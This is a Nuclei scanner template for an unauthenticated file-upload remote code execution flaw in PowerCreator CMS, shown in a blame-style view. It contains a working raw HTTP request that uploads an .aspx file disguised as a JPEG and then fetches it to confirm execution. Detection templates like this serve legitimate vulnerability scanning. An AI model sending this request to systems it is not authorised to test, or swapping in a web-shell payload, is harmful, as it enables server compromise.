nuclei-templates/http/vulnerabilities/other/powercreator-cms-rce.yaml

51 lines
1.6 KiB
YAML
Raw Normal View History

2021-02-14 08:40:45 +00:00
id: powercreator-cms-rce
info:
name: PowerCreator CMS - Remote Code Execution
2021-02-14 08:40:45 +00:00
author: pikpikcu
severity: critical
2022-05-31 09:17:10 +00:00
description: |
PowerCreator CMS is susceptible to a remote code execution vulnerability.
reference:
- https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: rce,powercreator,intrusive,fileupload
2021-02-14 08:40:45 +00:00
http:
2021-02-14 08:40:45 +00:00
- raw:
- |
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host: {{Hostname}}
Content-Disposition: form-data;name="file1";filename="poc.aspx";
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
Content-Type: image/jpeg
2021-05-05 12:09:31 +00:00
{{randstr}}
2021-02-14 08:40:45 +00:00
-----------------------------20873900192357278038549710136--
- |
2021-02-14 10:59:41 +00:00
GET /ResourcePic/{{endpoint}} HTTP/1.1
2021-02-14 08:40:45 +00:00
Host: {{Hostname}}
extractors:
- type: regex
2021-02-14 10:59:41 +00:00
name: endpoint
2021-02-14 08:40:45 +00:00
internal: true
part: body
regex:
- "(.*?.ASPX)"
2021-05-05 12:09:31 +00:00
req-condition: true
2021-02-14 08:40:45 +00:00
matchers:
2021-02-14 10:59:41 +00:00
- type: dsl
dsl:
- "contains(body_2, '{{randstr}}') && status_code_2 == 200"
# digest: 4a0a0047304502210086be09896d61618e699913cf8cdf894d358f047a1350aa91c1147e13705c82d202206350113e795327c4005a36f078645fac043f5966861ff2b70df16b7287b1ac66:922c64590222798bb761d5b6d8e72950